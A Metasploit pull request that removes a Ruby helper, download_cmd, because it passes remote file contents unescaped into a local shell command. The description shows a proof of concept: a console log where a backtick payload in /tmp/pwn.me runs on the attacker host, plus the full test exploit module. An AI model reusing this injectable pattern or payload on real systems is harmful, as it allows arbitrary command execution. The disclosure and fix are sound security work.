### PR TITLE
Remove Msf::Post::Linux::Priv.download_cmd method

### DIFF
--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
@@ -33,11 +33,6 @@ module Priv
   # Multiple functions to simulate native commands added
   #
 
-  def download_cmd(remote_path, local_path)
-    file_origin = read_file(remote_path)
-    `echo "#{file_origin}" > #{local_path}`
-  end
-
   def touch_cmd(new_path_file)
     cmd_exec("> #{new_path_file}")
   end


### PR DESCRIPTION
Remove `Msf::Post::Linux::Priv.download_cmd` method.

`Msf::Post::Linux::Priv.download_cmd` is not used anywhere in `lib/*` or `modules/*`.

I don't know why this method exists and don't care. It is insane. It is also vulnerable to command injection.

```
msf5 > 
[*] Sending stage (3012516 bytes) to 172.16.191.205
[*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.205:55510) at 2020-07-22 11:20:07 -0400

msf5 > use exploit/linux/local/test 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/test) > set session 1
session => 1
msf5 exploit(linux/local/test) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/test) > uname -a
[*] exec: uname -a

Linux kali 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux
msf5 exploit(linux/local/test) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf5 exploit(linux/local/test) > sessions -c "cat /tmp/pwn.me"
[*] Running 'cat /tmp/pwn.me' on meterpreter session 1 (172.16.191.205)
`uname -a; id`

msf5 exploit(linux/local/test) > cat /tmp/lolol
[*] exec: cat /tmp/lolol

cat: /tmp/lolol: No such file or directory
msf5 exploit(linux/local/test) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test) > cat /tmp/lolol
[*] exec: cat /tmp/lolol

Linux kali 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)

msf5 exploit(linux/local/test) > 
```

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Test',
      'Description'    => %q{
        Test
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'test'
        ],
      'DisclosureDate' => "Jul 01 2018",
      'Platform'       => [ 'linux', 'solaris', 'unix' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultOptions' =>
        { 
          'PAYLOAD'          => 'linux/x64/meterpreter/reverse_tcp'
        },
      'References'     =>
        [
          ['CVE', '1234-5678']
        ]
    ))
  end

  def check
    CheckCode::Unknown
  end

  def exploit
    download_cmd('/tmp/pwn.me', '/tmp/lolol')
  end
end
```
